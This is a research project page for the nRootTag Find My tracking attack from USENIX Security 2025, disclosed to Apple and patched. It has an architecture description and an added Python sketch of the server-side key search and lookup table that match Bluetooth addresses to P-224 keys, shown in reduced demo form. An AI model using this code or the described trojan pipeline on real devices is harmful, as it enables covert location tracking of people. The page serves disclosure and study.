Tracking You from a Thousand Miles Away! Turning a Bluetooth Device into an Apple AirTag Without Root Privileges

George Mason University
USENIX Security 2025

Attacking billions of devices


A remote attacker can exploit this vulnerability to turn your device, whether it is a desktop, smartphone, or smartwatch, into an AirTag-like tracker and follow your location. Over 1.5 billion iPhones could act as free tracking agents for the attacker worldwide.

Abstract

Apple’s Find My network, leveraging over a billion active Apple devices, is the world’s largest device-locating network. We investigate the potential misuse of this network to maliciously track Bluetooth devices. We present nRootTag, a novel attack method that transforms computers into trackable “AirTags” without requiring root privileges. The attack achieves a success rate of over 90% within minutes at a cost of only a few US dollars; alternatively, a rainbow table can be precomputed so that matching keys are found instantly. Once a matching key is obtained, the attacker can locate the computer within minutes, posing a substantial risk to user privacy and safety. The attack is effective on Linux, Windows, and Android systems, and can be employed to track desktops, laptops, smartphones, and IoT devices. Our comprehensive evaluation demonstrates nRootTag’s effectiveness and efficiency across various scenarios.

Overview of Find My Offline Finding

Overview

The figure illustrates Find My offline finding. (1) Through pairing, an AirTag shares its public/private key information with the owner’s device. (2) When the AirTag is separated from the paired device, it advertises its public key via BLE advertisements, known as lost messages. (3) Nearby Apple devices, referred to as finders, generate encrypted location reports and send them, along with the hashed public key, to the Apple Cloud. (4) The Apple Cloud allows anyone who presents a hashed public key to retrieve the associated location reports, which can only be decrypted with the corresponding private key. To preserve anonymity, finders do not authenticate whether a lost message was sent by a genuine Apple device; any BLE advertiser that emits a well-formed lost message is reported.

Architecture of nRootTag


The figure illustrates the architecture of our design. (1) The Trojan code runs on the computer to be tracked. It reads the computer’s Bluetooth advertising address (which it cannot change without root privileges), acquires a public key matching that address from our server, and then advertises lost messages. (2) The Server processes requests for matching public keys through rainbow table lookup or online key search. (3) The Database system, which holds a rainbow table of key information, returns the public/private key pair corresponding to a given advertising address. (4) The Key Generation and Search component serves two purposes: it precomputes the rainbow table, and it is invoked to search for a matching public/private key pair on the fly. Finally, given a public key, the server uses its hash value to query the Apple Cloud for location reports, then decrypts the reports with the private key.
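The sketch below is an added example, not the authors’ code or the paper’s implementation; it shows how the server-side Key Generation and Search and the table lookup in the architecture above connect to the offline-finding flow in the earlier overview. It assumes the publicly documented Find My lost-message format (Heinrich et al., OpenHaystack): the finder rebuilds the first six bytes of the 28-byte P-224 public key from the advertiser’s BLE address, with the address’s top two bits replaced by two bits carried elsewhere in the advertisement, so a key “matches” an address when its leading bytes agree on those 46 bits; and it assumes that location reports are indexed by the SHA-256 hash of the public key. The curve arithmetic is a minimal textbook implementation over the FIPS 186-4 P-224 parameters, the incremental-search trick (one point addition per candidate) is this example’s own choice rather than a claim about the paper, and the demo matches only the first two address bytes so it finishes in seconds; the sample address is constructed.

```python
import base64
import hashlib

# NIST P-224 domain parameters (FIPS 186-4), the curve used for Find My keys.
P = 2**224 - 2**96 + 1
A = P - 3
B = 0xB4050A850C04B3ABF54132565044B0B7D7BFD8BA270B39432355FFB4
G = (0xB70E0CBD6BB4BF7F321390B94A03C1D356C21122343280D6115C1D21,
     0xBD376388B5F723FB4C22DFE6CD4375A05A07476444D5819985007E34)
N = 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFF16A2E0B8F03E13DD29455C5C2A3D


def on_curve(pt):
    if pt is None:  # point at infinity
        return True
    x, y = pt
    return (y * y - (x * x * x + A * x + B)) % P == 0


def point_add(p1, p2):
    """Affine point addition (and doubling); None is the point at infinity."""
    if p1 is None:
        return p2
    if p2 is None:
        return p1
    x1, y1 = p1
    x2, y2 = p2
    if x1 == x2:
        if (y1 + y2) % P == 0:
            return None
        lam = (3 * x1 * x1 + A) * pow(2 * y1, -1, P) % P
    else:
        lam = (y2 - y1) * pow((x2 - x1) % P, -1, P) % P
    x3 = (lam * lam - x1 - x2) % P
    y3 = (lam * (x1 - x3) - y1) % P
    return (x3, y3)


def scalar_mult(k, pt):
    result = None
    while k:
        if k & 1:
            result = point_add(result, pt)
        pt = point_add(pt, pt)
        k >>= 1
    return result


def public_key_bytes(pt):
    """The 28-byte x-coordinate that a lost message carries."""
    return pt[0].to_bytes(28, "big")


def masked_prefix(data, match_bytes):
    # Assumed rule: the top two bits of byte 0 are not carried in the address
    # (the advertisement moves them to a hint byte), so they are masked out.
    return bytes([data[0] & 0x3F]) + data[1:match_bytes]


def address_matches(addr, pub, match_bytes=6):
    """True when the public key would be reconstructed from this BLE address.
    match_bytes < 6 shrinks the search space for demonstration only."""
    return masked_prefix(addr, match_bytes) == masked_prefix(pub, match_bytes)


def search_key(addr, match_bytes=6, start=1, budget=1 << 18):
    """Online search: walk private keys d, d+1, d+2, ... with Q_{d+1} = Q_d + G,
    one point addition per candidate instead of a full scalar multiplication.
    (start + budget stays far below N, so Q never reaches infinity here.)"""
    d = start
    q = scalar_mult(d, G)
    for _ in range(budget):
        pub = public_key_bytes(q)
        if address_matches(addr, pub, match_bytes):
            return d, pub
        d += 1
        q = point_add(q, G)
    return None  # budget exhausted; caller may retry with a new start


def build_table(match_bytes, start=1, count=1 << 14):
    """Precomputed lookup table (the page's "rainbow table"): masked key prefix
    -> first private key seen with that prefix."""
    table = {}
    d = start
    q = scalar_mult(d, G)
    for _ in range(count):
        table.setdefault(masked_prefix(public_key_bytes(q), match_bytes), d)
        d += 1
        q = point_add(q, G)
    return table


def table_lookup(table, addr, match_bytes):
    d = table.get(masked_prefix(addr, match_bytes))
    return None if d is None else (d, public_key_bytes(scalar_mult(d, G)))


def report_index(pub):
    """Assumed: reports are filed under base64(SHA-256(public key)) in the query."""
    return base64.b64encode(hashlib.sha256(pub).digest()).decode()


if __name__ == "__main__":
    addr = bytes.fromhex("d4a91c0b7e52")  # constructed sample BLE address
    table = build_table(match_bytes=2)
    d, pub = table_lookup(table, addr, 2) or search_key(addr, match_bytes=2)
    print(f"d={d:#x} pub={pub.hex()[:12]}... query id={report_index(pub)}")
```

The table path and the online path return the same kind of pair, which is what the server needs: the public key goes into the trojan’s advertisement and, hashed, into the cloud query, while the private key stays server-side to decrypt the returned reports. Raising `match_bytes` to 6 turns this into the real 46-bit search, which is why the paper moves key generation to GPUs or precomputes the table.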

GPU Benchmark


Our study examined several consumer-grade GPUs, including the RTX 3070, RTX 3080, and RTX 4090, as well as the data center-grade A100 (80GB) and H100 (80GB). Although the H100 achieves the highest key generation speed, its much higher cost makes the RTX 3080 the more economical choice in terms of keys generated per dollar.

Acknowledgments

This work was supported in part by the US National Science Foundation (NSF) under grants CNS-2304720, CNS-2310322, CNS-2309550, and CNS-2309477. It was also supported in part by the Commonwealth Cyber Initiative (CCI). The authors extend their gratitude to the anonymous reviewers and shepherd for their invaluable feedback and suggestions. We also acknowledge Google Earth for the map tiles used in our figures.

In addition, we appreciate the help of the Apple Security Team for their prompt responses and acknowledgement. Apple has released patches in iOS 18.2, visionOS 2.2, iPadOS 17.7.3 and 18.2, watchOS 11.2, tvOS 18.2, and macOS Ventura 13.7.2, Sonoma 14.7.2, and Sequoia 15.2 to fix the vulnerability. However, the attack remains effective as long as unpatched iPhones or Apple Watches are in proximity to the computer running our trojan.


BibTeX


@inproceedings{chen2025track,
title={Tracking You from a Thousand Miles Away! Turning a Bluetooth Device into an Apple AirTag Without Root Privileges},
author={Chen, Junming and Ma, Xiaoyue and Luo, Lannan and Zeng, Qiang},
booktitle={USENIX Security Symposium (USENIX Security)},
year={2025}
}